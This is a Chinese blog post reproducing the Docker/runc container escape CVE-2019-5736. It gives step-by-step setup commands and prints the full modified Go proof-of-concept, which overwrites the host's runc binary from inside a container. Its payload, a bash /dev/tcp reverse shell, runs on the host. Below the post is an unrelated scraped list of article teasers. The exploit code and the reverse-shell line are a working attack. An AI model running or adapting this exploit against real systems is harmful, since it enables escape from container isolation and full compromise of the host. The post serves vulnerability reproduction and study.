Beyond My
Beyond My

Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记

Docker逃逸漏洞复现(CVE-2019-5736)

1、安装漏洞环境(Ubuntu 18.04)
下载脚本并执行:

curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh

2、执行完后查看版本信息

# 注:这里脚本执行完成后会直接进入docker环境中,需要退出然后再查看版本!!

Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记_第1张图片
3、以上脚本会自动拉取一个Ubuntu镜像:
在这里插入图片描述
4、下载修改Poc:

https://github.com/Frichetten/CVE-2019-5736-PoC

(1)修改POC:
增加要执行的命令,这里我直接反弹shell:
在这里插入图片描述
(2)修改sh为bash启动,否则进入容器会报错:
在这里插入图片描述
5、编译POC

CGO_ENABLED=0 GOOS=linux GOARCH=amd64  go build main.go
# 需要安装golang-go和gccgo-go

6、将编译好的main文件拷贝至docker镜像

docker cp main ff7b424d59bc:/home

7、在docker里面运行mian文件

注:docker里面我也安装了golang-go和gccgo-go,否则显示缺少libgo.so

在这里插入图片描述
8、模拟用户进入docker镜像:

docker exec -ti ff7b424d59bc /bin/bash
# POC中的/bin/sh需要改为/bin/bash,要不然报错:

9、查看docker里面运行的POC
Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记_第2张图片
10、命令成功执行,接收到反弹的shell
Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记_第3张图片
11、经查看,反弹的shell为宿主机
Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记_第4张图片

附修改后的POC:

package main

// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
        "fmt"
        "io/ioutil"
        "os"
        "strconv"
        "strings"
        "flag"
)


var shellCmd string

func init() {
        flag.StringVar(&shellCmd, "shell", "", "Execute arbitrary commands")
        flag.Parse()
}

func main() {
        // This is the line of shell commands that will execute on the host
        var payload = "#!/bin/bash \n bash -i >& /dev/tcp/ip/port 0>&1" + shellCmd
        // First we overwrite /bin/sh with the /proc/self/exe interpreter path
        fd, err := os.Create("/bin/bash")
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Fprintln(fd, "#!/proc/self/exe")
        err = fd.Close()
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Println("[+] Overwritten /bin/sh successfully")

        // Loop through all processes to find one whose cmdline includes runcinit
        // This will be the process created by runc
        var found int
        for found == 0 {
                pids, err := ioutil.ReadDir("/proc")
                if err != nil {
                        fmt.Println(err)
                        return
                }
                for _, f := range pids {
                        fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
                        fstring := string(fbytes)
                        if strings.Contains(fstring, "runc") {
                                fmt.Println("[+] Found the PID:", f.Name())
                                found, err = strconv.Atoi(f.Name())
                                if err != nil {
                                        fmt.Println(err)
                                        return
                                }
                        }
                }
        }

        // We will use the pid to get a file handle for runc on the host.
        var handleFd = -1
        for handleFd == -1 {
                // Note, you do not need to use the O_PATH flag for the exploit to work.
                handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
                if int(handle.Fd()) > 0 {
                        handleFd = int(handle.Fd())
                }
        }
        fmt.Println("[+] Successfully got the file handle")

        // Now that we have the file handle, lets write to the runc binary and overwrite it
        // It will maintain it's executable flag
        for {
                writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
                if int(writeHandle.Fd()) > 0 {
                        fmt.Println("[+] Successfully got write handle", writeHandle)
                        fmt.Println("[+] The command executed is" + payload)
                        writeHandle.Write([]byte(payload))
                        return
                }
        }
}

你可能感兴趣的:(docker逃逸,docker,安全)

  • [创业之路-484]:企业经营层 - 职场人如何识别积极的工作环境:信任机制:从「分工协作」到「全能防御」;目标聚焦:从「价值创造」到「风险规避」;系统进化:从「熵减秩序」到「熵增混乱」。
    前言:在一个分工明确安全可靠公平化的系统中,每个人只需要认真完成自己的目标,把其他环节交给受信任的队友,技术人只要关注技术,不需要防范被别人算计和坑害或吃亏。在一个不可靠不安全人治危机四伏的系统中,每个人不仅需要完成自己的目标,还需要把自己变成全才,以避免自己的付出在脱节的环节被淹没,还要关注各种无关的隐情,以避免在信息不对称时别忽悠,技术人员不仅仅要关注技术,还要人事,以防止一不小心暗算与坑害。
  • web与Java代码保护:混淆、压缩及反编译工具详解
    本文还有配套的精品资源,点击获取简介:为保障代码的安全性和保密性,IT行业中开发者采用代码混淆和压缩技术。本文将深入探讨web代码混淆压缩工具和Java代码反编译工具,解释它们的工作原理及应用。混淆工具如UglifyJS和Terser用于混淆JavaScript代码,使其难以理解;压缩工具如YUICompressor和GoogleClosureCompiler减小JavaScript和CSS文件的
  • 聊聊近期三大软件供应链安全威胁 墨菲安全 软件供应链安全企业安全建设开源组件AI投毒攻击
    我们对近期(大概近三个月吧)全球范围内发生的软件供应链安全事件进行了一些总结和分析,我们发现被提的次数最多的主要是三大类的风险:1)商业软件供应链攻击:商业软件开发过程不透明,开发商安全水平有限,加上过去企业对商业软件的安全缺乏强制的要求,导致今天商业采购的软件已经成为企业安全木桶的最短板。2)开源组件的投毒攻击:从近期大量曝光的安全事件分析可以发现,开源组件的投毒攻击是目前黑灰产最常用的攻击手段
  • 总结过去三年软件供应链安全一些非共识核心问题
    写在前面过去三年,我大概每年平均至少见300个企业的专家和大佬们,这三年下来也快1000人次了吧。虽然有一些人是重复见了很多次的,但每次见也多少会有新的收获。因为工作的原因,我们聊最多的话题其实是跟软件供应链安全相关的,所以我最近就特别想把过去我们这1000次交流过程中,聊到的最核心的问题都提炼出来,然后在今年的产品迭代、公众号、直播、闭门会议、对外技术交流分享中,把这些内容重点放进去。也是希望通
  • Home Assistant Piper语音引擎新增en_US-hfc_female-medium语音模型支持分析
    HomeAssistantPiper语音引擎新增en_US-hfc_female-medium语音模型支持分析addons:heavy_plus_sign:Dockeradd-onsforHomeAssistant项目地址:https://gitcode.com/gh_mirrors/add/addons背景概述近期HomeAssistant社区中的Piper语音引擎插件迎来了重要更新。作为开源智
  • 网络安全协议之SSL协议 北邮23级网安 sslweb安全网络
    SSL协议简介什么是SSL协议?SSL协议是一种安全套接层协议,它可以在TCP协议的基础上提供数据的加密、身份验证和完整性保护。SSL协议主要由两部分组成:握手协议和记录协议。握手协议负责建立安全连接,交换公钥和证书,商定对称密钥等;记录协议负责使用对称密钥对数据进行加密和解密,以及检测数据的完整性。SSL协议常用于Web浏览器和Web服务器之间的通信,例如HTTPS。(HTTPS是一种安全的HT
  • 你懂安全优化SSL嘛? 巴依老爷coder 安全安全ssl网络协议
    一文带你了解SSL全部内容CIA?SSL概述加密算法对比数字签名与证书RSA加密算法代码实操1.更完善的错误处理2.证书验证3.资源管理改进常见的面试问题CIA?在信息安全领域,CIA(保密性、完整性、可用性)是核心原则,各有其实现方法与面临的威胁:保密性:实现方法:运用加密技术,对称加密(如AES)适合大量数据快速加密,非对称加密(如RSA)用于密钥交换与数字签名;借助访问控制手段,像基于角色的
  • OpenSSL 与 OpenSSH 离线升级至最新版本 9.9p2
    OpenSSL与OpenSSH离线升级至最新版本9.9p2一、前言在网络安全日益重要的今天,保持系统中的OpenSSL和OpenSSH为最新版本是至关重要的。然而,在一些内网环境中,由于网络限制,无法直接从互联网上下载最新的软件包进行升级。本文将详细介绍如何在离线环境下将OpenSSL和OpenSSH升级到最新版本9.9p2。二、准备工作2.1下载所需软件包https://wwyq.lanzouo
  • MySQL(118)如何使用SSL进行加密连接?
    使用SSL进行加密连接可以有效地保护数据在传输过程中的安全性,防止数据被窃取或篡改。下面我们将详细介绍如何在Java应用中使用SSL与MySQL数据库建立加密连接。一.准备工作在开始之前,请确保你已经安装了MySQL,并且有Java开发环境(如JDK和Maven)。二.生成SSL证书生成自签名证书:你可以使用OpenSSL工具来生成自签名证书。以下是生成CA证书、服务器证书和客户端证书的步骤。#生
  • 量化策略进阶:事件驱动与另类数据挖掘实战
    前面的章节,我们已经详细探讨了量化系统的基础架构:从数据的获取与管理(数据层),到策略的研发与验证(回测层),再到指令的高速执行(交易执行层),以及确保资金安全的防线(风控与监控运维层),我们共同构建了一套完整的量化交易体系。今天,我们将深入探讨量化策略的更高维度:事件驱动型策略和另类数据挖掘。这不仅仅是技术栈的扩展,更是对市场洞察力和信息处理能力的全面提升,旨在帮助您的策略在传统量价数据之外,捕
  • windows本地使用docker-compose构建nginx+php访问thinkphp5 星芯ya Docker学习docker容器运维
    前言:继上一篇windows本地使用docker+nginx+mysql部署thinkphp5https://blog.csdn.net/hmx089674/article/details/136683679本期使用docker-compose搭建环境访问thinkphp5程序。第一步:准备工作检查本地是否安装docker-compose(cmd终端输入docker-compose-v检测,安装D
  • docker-compse安装nginx
    以下是使用DockerCompose安装Nginx的详细步骤:1.安装Docker和DockerCompose安装Docker:卸载旧版本的Docker(如果已安装):sudoapt-getremovedockerdocker-enginedocker.iocontainerdruncsudorm-rf/var/lib/dockersudorm-rf/var/lib/containerd安装必要的
  • 构建安全隔离的数据共享通道:NFS、CSI 与动态卷调度实践 观熵 Docker安全docker容器存储
    构建安全隔离的数据共享通道:NFS、CSI与动态卷调度实践关键词:容器存储、安全隔离、NFS、CSI插件、动态卷调度、跨节点挂载、PVC策略、Kubernetes卷权限摘要:在容器化应用中,跨Pod、跨节点的数据共享是典型需求场景,NFS与CSI(ContainerStorageInterface)成为主流实现路径。但共享存储往往伴随权限泄露、数据冲突、状态污染等风险。本文从NFS与CSI的原理出
  • 面向对象编程基础:封装、继承、多态与抽象的全面解析
    文章目录面向对象的三大特征面向对象编程基础之类与对象定义一个类创建对象并调用方法面向对象编程基础之继承和多态继承多态多态是面向对象的三大特征之一定义两个类定义一个函数鸭子类型面向对象编程基础之封装和抽象封装抽象面向对象编程基础之组合和接口组合接口总结面向对象的三大特征面向对象编程有三大特征:封装、继承和多态。封装(Encapsulation):封装确保对象中的数据安全,通过将数据和操作数据的方法封
  • docker 配置 hitsz_syl docker容器运维
    根据错误日志,关键问题是Docker无法通过systemd的socket激活机制找到监听套接字。以下是针对性解决方案:1.修改Docker服务配置cat>/etc/systemd/system/docker.service/etc/docker/daemon.json<
  • [内核开发手册] 一文搞懂 MISRA C编码规范 车载操作系统---攻城狮 语言学习(C/C++PythonRust等)嵌入式开发c语言开发语言
    一文搞懂MISRAC编码规范一、MISRAC是什么?二、如何获取MISRAC官方文档?获取步骤三、为何需要MISRAC标准?行业刚性需求四、MISRAC核心规则详解(以2012版为例)规则结构:关键规则类别及典型示例:1.环境约束2.数据类型安全3.初始化与声明4.表达式安全5.流程控制安全6.指针与内存安全7.预处理器规范8.标准库限制五、总结一、MISRAC是什么?MISRAC是由汽车工业软件
  • Docker技术全景解析:从核心原理到实践应用 Liudef06小白 docker容器运维
    Docker技术全景解析:从核心原理到实践应用引言:容器化革命的引擎2013年诞生的Docker并非容器技术的发明者,却成功地将Linux容器(LXC)这一底层技术转化为开发者友好的标准化工具。它通过镜像封装、环境一致性和资源隔离三大创新,解决了“在我机器上能跑,线上为什么不行”这一行业顽疾。Docker的核心突破在于创建了跨环境的应用交付标准——开发者构建的Docker镜像可在开发笔记本、测试服
  • iOS 出海 App 安全加固指南:无源码环境下的 IPA 加固与防破解方法
    随着越来越多国内开发团队将iOSApp推向海外市场,如何在交付和分发环节保护应用安全成为出海过程中的重要议题。尤其是App进入多个海外应用商店或通过第三方渠道发行时,容易被当地黑产或竞争对手进行逆向分析,从而暴露内部API、核心业务流程等敏感信息。然而,很多出海App项目采用外包或快速孵化模式,交付阶段常常只拿到ipa成品文件而非完整源码。此时,如何在不改动源码的情况下对成品ipa完成安全加固,成
  • 详解Binlog 和 Redo Log的区别和底层逻辑
    引言:为什么你的数据库会“分身术”?想象这样一个场景:你的Java应用突然崩溃,重启后发现数据丢失了一半。这时,你会想起数据库的“时光机”——Binlog,或者它的“安全网”——RedoLog?Binlog(BinaryLog)Binlog是MySQL数据库中的一种日志文件,用于记录所有对数据库执行的数据修改操作(如INSERT、UPDATE、DELETE等)。它以二进制的形式存储,主要用于数据复
  • 网络安全之注入攻击:原理、危害与防御之道
    网络安全之注入攻击:原理、危害与防御之道引言在OWASPTop10安全风险榜单中,注入攻击常年占据首位。2023年Verizon数据泄露调查报告显示,67%的Web应用漏洞与注入类攻击直接相关。本文从技术视角系统解析注入攻击的核心原理、典型场景及防御体系,揭示这一"网络安全头号杀手"的攻防博弈。一、注入攻击的本质与分类1.1基本定义当应用程序将非可信数据(UntrustedData)作为代码解析时
  • java项目打包成 Docker 镜像几种方式 reiraoy eureka云原生
    1.准备工作安装Docker:确保本地或服务器上已安装Docker。创建SpringBoot项目:假设你已经有一个SpringBoot项目。2.使用docker-maven-plugin打包Docker镜像(1)在pom.xml中添加插件            com.spotify      docker-maven-plugin      1.2.2              ${projec
  • Wizard全栈开发框架:轻松构建企业级应用 GISer_Jinger 前端基础前端javascript
    Wizard全栈开发框架详解Wizard是一个现代化的全栈开发框架,旨在简化企业级应用的开发流程,提供从前端到后端的完整解决方案。一、核心架构前端架构UI层:支持React、Vue等主流框架状态管理:集成Redux、Vuex等方案API客户端:自动生成类型安全的API调用代码生成器:基于模板自动生成页面组件后端架构Web服务器:支持Express、SpringBoot等多种实现ORM:内置多数据库
  • 基于springboot的商业辅助决策系统的设计与实现 qq 79856539 javawebspringboot后端java
    一、项目介绍商业辅助决策系统实现的功能包括收入信息管理与支出信息管理,员工销售订单信息管理,员工薪资管理,员工管理,公告管理等功能。该系统采用了Mysql数据库,Java语言,SpringBoot框架等技术进行编程实现。商业辅助决策系统可以提高收支信息和销售订单信息管理问题的解决效率,优化收支信息和销售订单信息处理流程,保证收支信息和销售订单信息数据的安全,它是一个非常可靠,非常安全的应用程序。关
  • Ubuntu 14.04连接上海大学ShuWlan-1X与eduroam
    无线配置GUI窗口界面配置无线:安全-WPA及WAP2企业认证-受保护的EAP(PEAP)CAZ证书-不需要内部认证-MSCHAPv2eduroam的用户名为学号@sdvip.shu.edu.cn,密码为一卡通密码。ShuWlan-1X的用户名学号,密码为一卡通密码。
  • 轻量化分布式AGI架构:基于区块链构建终端神经元节点的互联网智脑 探客木木夕 分布式agi人工智能架构区块链
    在2025年的技术发展背景下,轻量化分布式AGI架构正成为人工智能领域的重要突破方向。通过将终端设备转化为神经元节点,结合区块链技术构建去中心化的互联网智脑,不仅能够突破传统AGI开发的算力瓶颈,还能实现数据安全共享与价值分配。**这一架构将重塑人工智能的发展范式,使AGI能力从中心化实验室扩散至全球终端设备网络,最终形成一个去中心化、自演进、高可用的互联网级智能系统**。研究显示,通过知识密度提
  • 基于物联网的城市低洼地段水深报警系统设计
    标题:基于物联网的城市低洼地段水深报警系统设计内容:1.摘要本文针对城市低洼地段在暴雨等天气下易积水,可能危及行人安全和造成车辆损坏等问题,设计了基于物联网的城市低洼地段水深报警系统。采用水位传感器实时监测低洼地段的水深数据,通过物联网通信模块将数据传输至云平台。在云平台上对数据进行分析处理,当水深超过预设阈值时,系统自动触发报警,通过短信、APP推送等方式通知相关人员。经过实际测试,该系统的水位
  • 容器革命:Docker 技术深度解析与未来趋势 小红花大酒店 Docker技术探秘docker容器运维
    容器革命:Docker技术深度解析与未来趋势一、容器化技术的颠覆性价值在云计算与微服务架构蓬勃发展的今天,Docker作为容器化技术的代表,正深刻改变着软件交付的范式。传统虚拟机(VM)需要为每个应用实例配备完整的操作系统,导致资源浪费和启动延迟(分钟级)。而Docker通过操作系统级虚拟化,将应用及其依赖打包成轻量级容器,实现了秒级启动和MB级资源占用。这种技术突破使得开发团队能够以标准化方式构
  • 如何在YashanDB中实现自动化备份? 数据库
    引言在现代数据库管理系统中,数据的安全性和可恢复性越来越受到重视。尤其是在数据可能因人为失误、硬件故障或网络问题而丢失的情况下,自动化备份解决方案显得尤为重要。YashanDB作为一款高性能的关系型数据库,支持多种备份策略以确保数据的安全性和一致性。本文将深入探讨YashanDB的备份机制、支持的备份类型及如何实现自动化备份策略的具体步骤,旨在帮助数据库管理员和技术人员有效管理其数据备份工作。Ya
  • 如何在YashanDB中实现与区块链的集成 数据库
    在当前的数字化时代,数据的安全性和完整性至关重要。随着区块链技术的兴起,企业对于如何将这项新兴技术与传统数据库(如YashanDB)相结合,已成为一个亟待解决的问题。区块链提供的数据不可篡改性使其成为加密金融、供应链管理以及智能合约等领域的重要组件。因此,如何实现YashanDB与区块链的无缝集成,便成为技术团队的重要任务。核心技术点YashanDB的事务和一致性管理YashanDB支持事务的AC
  • 一、Docker:一场颠覆应用部署与运维的容器革命 IvanCodes Docker教程docker容器
    作者:IvanCodes日期:2025年7月3日专栏:Docker教程在现代软件开发的世界里,Docker已经从一个新奇的工具演变成了一项基础性技术。它彻底改变了我们构建、打包、分发和运行应用程序的方式。无论你是开发者、运维工程师还是技术爱好者,理解Docker都是一项不可或缺的技能。本文将带你回顾Docker的发展历史,探索它能解决的实际问题,并清晰地解析其核心名词概念。一、Docker的“前世
  • knob UI插件使用 换个号韩国红果果 JavaScriptjsonpknob
    图形是用canvas绘制的 js代码 var paras = { max:800, min:100, skin:'tron',//button type thickness:.3,//button width width:'200',//define canvas width.,canvas height displayInput:'tr
  • Android+Jquery Mobile学习系列(5)-SQLite数据库 白糖_ JQuery Mobile
    目录导航   SQLite是轻量级的、嵌入式的、关系型数据库,目前已经在iPhone、Android等手机系统中使用,SQLite可移植性好,很容易使用,很小,高效而且可靠。   因为Android已经集成了SQLite,所以开发人员无需引入任何JAR包,而且Android也针对SQLite封装了专属的API,调用起来非常快捷方便。   我也是第一次接触S
  • impala-2.1.2-CDH5.3.2 dayutianfei impala
    最近在整理impala编译的东西,简单记录几个要点: 根据官网的信息(https://github.com/cloudera/Impala/wiki/How-to-build-Impala): 1. 首次编译impala,推荐使用命令: ${IMPALA_HOME}/buildall.sh -skiptests -build_shared_libs -format 2.仅编译BE ${I
  • 求二进制数中1的个数 周凡杨 java算法二进制
    解法一: 对于一个正整数如果是偶数,该数的二进制数的最后一位是 0 ,反之若是奇数,则该数的二进制数的最后一位是 1 。因此,可以考虑利用位移、判断奇偶来实现。   public int bitCount(int x){ int count = 0; while(x!=0){ if(x%2!=0){ /
  • spring中hibernate及事务配置 g21121 Hibernate
    hibernate的sessionFactory配置: <!-- hibernate sessionFactory配置 --> <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <
  • log4j.properties 使用 510888780 log4j
    log4j.properties 使用 一.参数意义说明 输出级别的种类 ERROR、WARN、INFO、DEBUG ERROR 为严重错误 主要是程序的错误 WARN 为一般警告,比如session丢失 INFO 为一般要显示的信息,比如登录登出 DEBUG 为程序的调试信息 配置日志信息输出目的地 log4j.appender.appenderName = fully.qua
  • Spring mvc-jfreeChart柱图(2) 布衣凌宇 jfreechart
    上一篇中生成的图是静态的,这篇将按条件进行搜索,并统计成图表,左面为统计图,右面显示搜索出的结果。 第一步:导包 第二步;配置web.xml(上一篇有代码) 建BarRenderer类用于柱子颜色 import java.awt.Color; import java.awt.Paint; import org.jfree.chart.renderer.category.BarR
  • 我的spring学习笔记14-容器扩展点之PropertyPlaceholderConfigurer aijuans Spring3
    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现,也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。 PropertyPlaceholderConfigurer可以将上下文(配置文件)中的属性值放在另一个单独的标准java
  • maven 之 cobertura 简单使用 antlove maventestunitcoberturareport
    1. 创建一个maven项目 2. 创建com.CoberturaStart.java package com; public class CoberturaStart { public void helloEveryone(){ System.out.println("=================================================
  • 程序的执行顺序 百合不是茶 JAVA执行顺序
          刚在看java核心技术时发现对java的执行顺序不是很明白了,百度一下也没有找到适合自己的资料,所以就简单的回顾一下吧   代码如下;     经典的程序执行面试题 //关于程序执行的顺序 //例如: //定义一个基类 public class A(){ public A(
  • 设置session失效的几种方法 bijian1013 web.xmlsession失效监听器
    在系统登录后,都会设置一个当前session失效的时间,以确保在用户长时间不与服务器交互,自动退出登录,销毁session。具体设置很简单,方法有三种:(1)在主页面或者公共页面中加入:session.setMaxInactiveInterval(900);参数900单位是秒,即在没有活动15分钟后,session将失效。这里要注意这个session设置的时间是根据服务器来计算的,而不是客户端。所
  • java jvm常用命令工具 bijian1013 javajvm
    一.概述         程序运行中经常会遇到各种问题,定位问题时通常需要综合各种信息,如系统日志、堆dump文件、线程dump文件、GC日志等。通过虚拟机监控和诊断工具可以帮忙我们快速获取、分析需要的数据,进而提高问题解决速度。 本文将介绍虚拟机常用监控和问题诊断命令工具的使用方法,主要包含以下工具:       &nbs
  • 【Spring框架一】Spring常用注解之Autowired和Resource注解 bit1129 Spring常用注解
    Spring自从2.0引入注解的方式取代XML配置的方式来做IOC之后,对Spring一些常用注解的含义行为一直处于比较模糊的状态,写几篇总结下Spring常用的注解。本篇包含的注解有如下几个: Autowired Resource Component Service Controller Transactional 根据它们的功能、目的,可以分为三组,Autow
  • mysql 操作遇到safe update mode问题 bitray update
        我并不知道出现这个问题的实际原理,只是通过其他朋友的博客,文章得知的一个解决方案,目前先记录一个解决方法,未来要是真了解以后,还会继续补全.     在mysql5中有一个safe update mode,这个模式让sql操作更加安全,据说要求有where条件,防止全表更新操作.如果必须要进行全表操作,我们可以执行 SET
  • nginx_perl试用 ronin47 nginx_perl试用
    因为空闲时间比较多,所以在CPAN上乱翻,看到了nginx_perl这个项目(原名Nginx::Engine),现在托管在github.com上。地址见:https://github.com/zzzcpan/nginx-perl 这个模块的目的,是在nginx内置官方perl模块的基础上,实现一系列异步非阻塞的api。用connector/writer/reader完成类似proxy的功能(这里
  • java-63-在字符串中删除特定的字符 bylijinnan java
    public class DeleteSpecificChars { /** * Q 63 在字符串中删除特定的字符 * 输入两个字符串,从第一字符串中删除第二个字符串中所有的字符。 * 例如,输入”They are students.”和”aeiou”,则删除之后的第一个字符串变成”Thy r stdnts.” */ public static voi
  • EffectiveJava--创建和销毁对象 ccii 创建和销毁对象
    本章内容: 1. 考虑用静态工厂方法代替构造器 2. 遇到多个构造器参数时要考虑用构建器(Builder模式) 3. 用私有构造器或者枚举类型强化Singleton属性 4. 通过私有构造器强化不可实例化的能力 5. 避免创建不必要的对象 6. 消除过期的对象引用 7. 避免使用终结方法 1. 考虑用静态工厂方法代替构造器     类可以通过
  • [宇宙时代]四边形理论与光速飞行 comsci
       从四边形理论来推论 为什么光子飞船必须获得星光信号才能够进行光速飞行?    一组星体组成星座  向空间辐射一组由复杂星光信号组成的辐射频带,按照四边形-频率假说  一组频率就代表一个时空的入口    那么这种由星光信号组成的辐射频带就代表由这些星体所控制的时空通道,该时空通道在三维空间的投影是一
  • ubuntu server下python脚本迁移数据 cywhoyi pythonKettlepymysqlcx_Oracleubuntu server
    因为是在Ubuntu下,所以安装python、pip、pymysql等都极其方便,sudo apt-get install pymysql, 但是在安装cx_Oracle(连接oracle的模块)出现许多问题,查阅相关资料,发现这边文章能够帮我解决,希望大家少走点弯路。http://www.tbdazhe.com/archives/602 1.安装python 2.安装pip、pymysql
  • Ajax正确但是请求不到值解决方案 dashuaifu Ajaxasync
    Ajax正确但是请求不到值解决方案   解决方案:1 .     async: false ,    2.     设置延时执行js里的ajax或者延时后台java方法!!!!!!!   例如:   $.ajax({     &
  • windows安装配置php+memcached dcj3sjt126com PHPInstallmemcache
    Windows下Memcached的安装配置方法 1、将第一个包解压放某个盘下面,比如在c:\memcached。 2、在终端(也即cmd命令界面)下输入 'c:\memcached\memcached.exe -d install' 安装。 3、再输入: 'c:\memcached\memcached.exe -d start' 启动。(需要注意的: 以后memcached将作为windo
  • iOS开发学习路径的一些建议 dcj3sjt126com ios
    iOS论坛里有朋友要求回答帖子,帖子的标题是: 想学IOS开发高阶一点的东西,从何开始,然后我吧啦吧啦回答写了很多。既然敲了那么多字,我就把我写的回复也贴到博客里来分享,希望能对大家有帮助。欢迎大家也到帖子里讨论和分享,地址:http://bbs.csdn.net/topics/390920759   下面是我回复的内容:   结合自己情况聊下iOS学习建议,
  • Javascript闭包概念 fanfanlovey JavaScript闭包
    1.参考资料 http://www.jb51.net/article/24101.htm http://blog.csdn.net/yn49782026/article/details/8549462 2.内容概述 要理解闭包,首先需要理解变量作用域问题 内部函数可以饮用外面全局变量 var n=999;   functio
  • yum安装mysql5.6 haisheng mysql
    1、安装http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm   2、yum install mysql   3、yum install mysql-server   4、vi /etc/my.cnf   添加character_set_server=utf8
  • po/bo/vo/dao/pojo的详介 IT_zhlp80 javaBOVODAOPOJOpo
        JAVA几种对象的解释 PO:persistant object持久对象,可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作. VO:value object值对象。通常用于业务层之间的数据传递,和PO一样也是仅仅包含数据而已。但应是抽象出的业务对象,可
  • java设计模式 kerryg java设计模式
    设计模式的分类:    一、 设计模式总体分为三大类: 1、创建型模式(5种):工厂方法模式,抽象工厂模式,单例模式,建造者模式,原型模式。 2、结构型模式(7种):适配器模式,装饰器模式,代理模式,外观模式,桥接模式,组合模式,享元模式。 3、行为型模式(11种):策略模式,模版方法模式,观察者模式,迭代子模式,责任链模式,命令模式,备忘录模式,状态模式,访问者
  • [1]CXF3.1整合Spring开发webservice——helloworld篇 木头.java springwebserviceCXF
    Spring 版本3.2.10 CXF 版本3.1.1 项目采用MAVEN组织依赖jar 我这里是有parent的pom,为了简洁明了,我直接把所有的依赖都列一起了,所以都没version,反正上面已经写了版本 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="ht
  • Google 工程师亲授:菜鸟开发者一定要投资的十大目标 qindongliang1922 工作感悟人生
    身为软件开发者,有什么是一定得投资的? Google 软件工程师 Emanuel Saringan 整理了十项他认为必要的投资,第一项就是身体健康,英文与数学也都是必备能力吗?来看看他怎么说。(以下文字以作者第一人称撰写)) 你的健康 无疑地,软件开发者是世界上最久坐不动的职业之一。 每天连坐八到十六小时,休息时间只有一点点,绝对会让你的鲔鱼肚肆无忌惮的生长。肥胖容易扩大罹患其他疾病的风险,
  • linux打开最大文件数量1,048,576 tianzhihehe clinux
    File descriptors are represented by the C int type. Not using a special type is often  considered odd, but is, historically, the Unix way. Each Linux process has a maximum number of files th
  • java语言中PO、VO、DAO、BO、POJO几种对象的解释 衞酆夼 javaVOBOPOJOpo
    PO:persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作。 BO:business object业务对象 封装业务逻辑的java对象
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他